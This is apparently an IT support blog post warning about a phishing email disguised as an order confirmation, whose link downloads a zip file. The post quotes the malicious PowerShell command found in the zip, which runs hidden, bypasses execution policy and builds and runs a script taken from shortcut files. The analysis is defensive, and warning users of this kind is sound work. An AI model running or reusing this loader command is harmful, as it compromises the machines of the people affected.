sircles.net Computer Support The sircles IT support & solutions blog | Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent

Twitter Feed Popout byInfofru

The sircles IT support & solutions blog Internet Safety & Security, Windows Tweaks and Server Fixes

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent   This email has been spotted

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent

 

This email has been spotted this week:

 

 

 

From: lou_weihe@clarityconfidenceandcash.com

Sent:                                                         Monday, July 30, 2018 10:52 PM

To:                                                            Recipient

Subject:                                                   Your, Name Pack(4M0A_8141) confirmed: 5 items sent

 

Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.

 

WOMEN

MEN

ACCESSORIES

HOME DECOR

GADGETS


Hi Your Name,

Great news! Your order is now confirmed. We will email you again when your items ship.

Thanks for shopping with us!

Order ID: 4M0A_8141

Shipping Address:

Your Name
Your Phone Your Postcode 

View Order


This email was sent from a notification-only address that cannot accept incoming emails.
Please do not reply to this message. If you have any questions or concerns, please contact us 

 

 
Which downloads a file: 4M0A_8141-order-Receipt.zip
Zip files are not often used as orders anyway but this website, https://johanwolf.com obviously has a valid certificate and is being misused by someone. The website just seems to forward to Office365 support for some reason???
 
If you unzip the file that is provided you see an image:
 
 
Which presumably pretends to be a real company.
 
And a file which runs a script:
 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit
 
Which will make serious changes to your system. Looking at this we are not sure it would work but might try it on an old PC ..?
 
We will let you know.
 
Anyway, report the sender and the website and keep vigilant!
 
 

Comments (1) -

upnt 28/11/2018 22:24:26 #

698042 651870I  respect  your  piece of function,  appreciate it for all of the  intriguing   content material . 757816

Reply

Add comment